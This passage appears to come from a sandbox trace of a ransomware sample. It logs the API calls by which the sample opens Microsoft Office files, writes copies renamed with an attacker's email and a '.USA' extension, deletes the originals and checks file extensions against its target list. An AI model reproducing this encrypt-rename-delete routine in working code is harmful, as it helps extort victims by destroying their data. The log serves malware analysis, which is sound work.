Shared\\OFFICE14\\Office Setup Controller\\Project.en-us\\SETUP.XML") returned 103 [0041.081] lstrlenW (lpString=".jpg") returned 4 [0041.081] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.081] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0041.081] lstrlenW (lpString="ProPlusrWW.XML") returned 14 [0041.081] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0041.523] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=16852) returned 1 [0041.523] CloseHandle (hObject=0x1b4) returned 1 [0041.523] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml")) returned 0x20 [0041.523] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0041.523] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0041.523] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0041.523] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0041.523] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0041.524] GetLastError () returned 0x0 [0041.524] ReadFile (in: hFile=0x1b4, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x41d4, lpOverlapped=0x0) returned 1 [0041.525] WriteFile (in: hFile=0x1f0, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x41e0, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x41e0, lpOverlapped=0x0) returned 1 [0041.527] ReadFile (in: hFile=0x1b4, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0041.527] WriteFile (in: hFile=0x1f0, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xf0, lpOverlapped=0x0) returned 1 [0041.527] SetEndOfFile (hFile=0x1f0) returned 1 [0041.527] CloseHandle (hObject=0x1f0) returned 1 [0041.528] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0041.528] SetEndOfFile (hFile=0x1b4) returned 1 [0041.529] CloseHandle (hObject=0x1b4) returned 1 [0041.529] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0041.529] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\proplusr\\proplusrww.xml")) returned 1 [0041.529] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0041.529] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0041.529] lstrlenW (lpString=".doc") returned 4 [0041.529] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.529] lstrlenW (lpString=".docx") returned 5 [0041.529] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1 [0041.529] lstrlenW (lpString=".pdf") returned 4 [0041.529] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.529] lstrlenW (lpString=".xls") returned 4 [0041.529] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.529] lstrlenW (lpString=".xlsx") returned 5 [0041.529] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1 [0041.529] lstrlenW (lpString=".ppt") returned 4 [0041.530] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.530] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0041.530] lstrlenW (lpString=".zip") returned 4 [0041.530] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.530] lstrlenW (lpString=".rar") returned 4 [0041.530] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.530] lstrlenW (lpString=".bz2") returned 4 [0041.530] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.530] lstrlenW (lpString=".7z") returned 3 [0041.530] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.530] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0041.530] lstrlenW (lpString=".dbf") returned 4 [0041.530] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.530] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0041.530] lstrlenW (lpString=".1cd") returned 4 [0041.530] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.530] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0041.530] lstrlenW (lpString=".jpg") returned 4 [0041.530] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.530] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0041.530] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0041.530] lstrlenW (lpString=".doc") returned 4 [0041.530] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.530] lstrlenW (lpString=".docx") returned 5 [0041.530] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1 [0041.530] lstrlenW (lpString=".pdf") returned 4 [0041.530] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.530] lstrlenW (lpString=".xls") returned 4 [0041.530] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.530] lstrlenW (lpString=".xlsx") returned 5 [0041.530] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1 [0041.530] lstrlenW (lpString=".ppt") returned 4 [0041.530] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.530] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0041.531] lstrlenW (lpString=".zip") returned 4 [0041.531] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.531] lstrlenW (lpString=".rar") returned 4 [0041.531] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.531] lstrlenW (lpString=".bz2") returned 4 [0041.531] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.531] lstrlenW (lpString=".7z") returned 3 [0041.531] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.531] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0041.531] lstrlenW (lpString=".dbf") returned 4 [0041.531] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.531] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0041.531] lstrlenW (lpString=".1cd") returned 4 [0041.531] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.531] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PROPLUSR\\ProPlusrWW.XML") returned 103 [0041.531] lstrlenW (lpString=".jpg") returned 4 [0041.531] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.531] lstrcmpiW (lpString1=".HTM", lpString2=".USA") returned -1 [0041.531] lstrlenW (lpString="MCABOUT.HTM") returned 11 [0041.531] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0041.532] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=11463) returned 1 [0041.532] CloseHandle (hObject=0x1b4) returned 1 [0041.532] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm")) returned 0x20 [0041.532] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0041.532] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0041.532] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0041.533] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0041.533] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0041.534] GetLastError () returned 0x0 [0041.534] ReadFile (in: hFile=0x1b4, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x2cc7, lpOverlapped=0x0) returned 1 [0041.536] WriteFile (in: hFile=0x170, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x2cd0, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x2cd0, lpOverlapped=0x0) returned 1 [0041.537] ReadFile (in: hFile=0x1b4, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0041.537] WriteFile (in: hFile=0x170, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xea, lpOverlapped=0x0) returned 1 [0041.537] SetEndOfFile (hFile=0x170) returned 1 [0041.537] CloseHandle (hObject=0x170) returned 1 [0041.538] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0041.538] SetEndOfFile (hFile=0x1b4) returned 1 [0041.539] CloseHandle (hObject=0x1b4) returned 1 [0041.539] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0041.539] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm")) returned 1 [0041.539] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0041.539] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0041.539] lstrlenW (lpString=".doc") returned 4 [0041.539] lstrcmpiW (lpString1=".doc", lpString2=".HTM") returned -1 [0041.539] lstrlenW (lpString=".docx") returned 5 [0041.539] lstrcmpiW (lpString1=".docx", lpString2="T.HTM") returned -1 [0041.539] lstrlenW (lpString=".pdf") returned 4 [0041.539] lstrcmpiW (lpString1=".pdf", lpString2=".HTM") returned 1 [0041.539] lstrlenW (lpString=".xls") returned 4 [0041.539] lstrcmpiW (lpString1=".xls", lpString2=".HTM") returned 1 [0041.539] lstrlenW (lpString=".xlsx") returned 5 [0041.539] lstrcmpiW (lpString1=".xlsx", lpString2="T.HTM") returned -1 [0041.539] lstrlenW (lpString=".ppt") returned 4 [0041.539] lstrcmpiW (lpString1=".ppt", lpString2=".HTM") returned 1 [0041.539] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0041.539] lstrlenW (lpString=".zip") returned 4 [0041.539] lstrcmpiW (lpString1=".zip", lpString2=".HTM") returned 1 [0041.540] lstrlenW (lpString=".rar") returned 4 [0041.540] lstrcmpiW (lpString1=".rar", lpString2=".HTM") returned 1 [0041.540] lstrlenW (lpString=".bz2") returned 4 [0041.540] lstrcmpiW (lpString1=".bz2", lpString2=".HTM") returned -1 [0041.540] lstrlenW (lpString=".7z") returned 3 [0041.540] lstrcmpiW (lpString1=".7z", lpString2="HTM") returned -1 [0041.540] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0041.540] lstrlenW (lpString=".dbf") returned 4 [0041.540] lstrcmpiW (lpString1=".dbf", lpString2=".HTM") returned -1 [0041.540] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0041.540] lstrlenW (lpString=".1cd") returned 4 [0041.540] lstrcmpiW (lpString1=".1cd", lpString2=".HTM") returned -1 [0041.540] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0041.540] lstrlenW (lpString=".jpg") returned 4 [0041.540] lstrcmpiW (lpString1=".jpg", lpString2=".HTM") returned 1 [0041.540] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0041.540] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0041.540] lstrlenW (lpString=".doc") returned 4 [0041.540] lstrcmpiW (lpString1=".doc", lpString2=".HTM") returned -1 [0041.540] lstrlenW (lpString=".docx") returned 5 [0041.540] lstrcmpiW (lpString1=".docx", lpString2="T.HTM") returned -1 [0041.540] lstrlenW (lpString=".pdf") returned 4 [0041.540] lstrcmpiW (lpString1=".pdf", lpString2=".HTM") returned 1 [0041.540] lstrlenW (lpString=".xls") returned 4 [0041.540] lstrcmpiW (lpString1=".xls", lpString2=".HTM") returned 1 [0041.540] lstrlenW (lpString=".xlsx") returned 5 [0041.540] lstrcmpiW (lpString1=".xlsx", lpString2="T.HTM") returned -1 [0041.540] lstrlenW (lpString=".ppt") returned 4 [0041.540] lstrcmpiW (lpString1=".ppt", lpString2=".HTM") returned 1 [0041.540] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0041.540] lstrlenW (lpString=".zip") returned 4 [0041.540] lstrcmpiW (lpString1=".zip", lpString2=".HTM") returned 1 [0041.540] lstrlenW (lpString=".rar") returned 4 [0041.540] lstrcmpiW (lpString1=".rar", lpString2=".HTM") returned 1 [0041.541] lstrlenW (lpString=".bz2") returned 4 [0041.541] lstrcmpiW (lpString1=".bz2", lpString2=".HTM") returned -1 [0041.541] lstrlenW (lpString=".7z") returned 3 [0041.541] lstrcmpiW (lpString1=".7z", lpString2="HTM") returned -1 [0041.541] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0041.541] lstrlenW (lpString=".dbf") returned 4 [0041.541] lstrcmpiW (lpString1=".dbf", lpString2=".HTM") returned -1 [0041.541] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0041.541] lstrlenW (lpString=".1cd") returned 4 [0041.541] lstrcmpiW (lpString1=".1cd", lpString2=".HTM") returned -1 [0041.541] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0041.541] lstrlenW (lpString=".jpg") returned 4 [0041.541] lstrcmpiW (lpString1=".jpg", lpString2=".HTM") returned 1 [0041.541] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0041.541] lstrlenW (lpString="DATES.XML") returned 9 [0041.541] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0041.541] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=8918) returned 1 [0041.541] CloseHandle (hObject=0x1b4) returned 1 [0041.542] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml")) returned 0x20 [0041.542] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0041.542] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0041.542] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0041.542] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0041.542] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0041.544] GetLastError () returned 0x0 [0041.544] ReadFile (in: hFile=0x1b4, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x22d6, lpOverlapped=0x0) returned 1 [0041.545] WriteFile (in: hFile=0x170, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x22e0, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x22e0, lpOverlapped=0x0) returned 1 [0041.546] ReadFile (in: hFile=0x1b4, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0041.546] WriteFile (in: hFile=0x170, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xe6, lpOverlapped=0x0) returned 1 [0041.546] SetEndOfFile (hFile=0x170) returned 1 [0041.547] CloseHandle (hObject=0x170) returned 1 [0041.547] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0041.547] SetEndOfFile (hFile=0x1b4) returned 1 [0041.548] CloseHandle (hObject=0x1b4) returned 1 [0041.548] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0041.548] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml")) returned 1 [0041.548] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0041.548] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0041.548] lstrlenW (lpString=".doc") returned 4 [0041.549] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.549] lstrlenW (lpString=".docx") returned 5 [0041.549] lstrcmpiW (lpString1=".docx", lpString2="S.XML") returned -1 [0041.549] lstrlenW (lpString=".pdf") returned 4 [0041.549] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.549] lstrlenW (lpString=".xls") returned 4 [0041.549] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.549] lstrlenW (lpString=".xlsx") returned 5 [0041.549] lstrcmpiW (lpString1=".xlsx", lpString2="S.XML") returned -1 [0041.549] lstrlenW (lpString=".ppt") returned 4 [0041.549] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.549] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0041.549] lstrlenW (lpString=".zip") returned 4 [0041.549] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.549] lstrlenW (lpString=".rar") returned 4 [0041.549] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.549] lstrlenW (lpString=".bz2") returned 4 [0041.549] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.549] lstrlenW (lpString=".7z") returned 3 [0041.549] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.549] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0041.549] lstrlenW (lpString=".dbf") returned 4 [0041.549] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.549] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0041.549] lstrlenW (lpString=".1cd") returned 4 [0041.549] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.549] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0041.549] lstrlenW (lpString=".jpg") returned 4 [0041.549] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.549] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0041.549] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0041.549] lstrlenW (lpString=".doc") returned 4 [0041.549] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.549] lstrlenW (lpString=".docx") returned 5 [0041.550] lstrcmpiW (lpString1=".docx", lpString2="S.XML") returned -1 [0041.550] lstrlenW (lpString=".pdf") returned 4 [0041.550] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.550] lstrlenW (lpString=".xls") returned 4 [0041.550] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.550] lstrlenW (lpString=".xlsx") returned 5 [0041.550] lstrcmpiW (lpString1=".xlsx", lpString2="S.XML") returned -1 [0041.550] lstrlenW (lpString=".ppt") returned 4 [0041.550] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.550] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0041.550] lstrlenW (lpString=".zip") returned 4 [0041.550] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.550] lstrlenW (lpString=".rar") returned 4 [0041.550] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.550] lstrlenW (lpString=".bz2") returned 4 [0041.550] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.550] lstrlenW (lpString=".7z") returned 3 [0041.550] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.550] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart 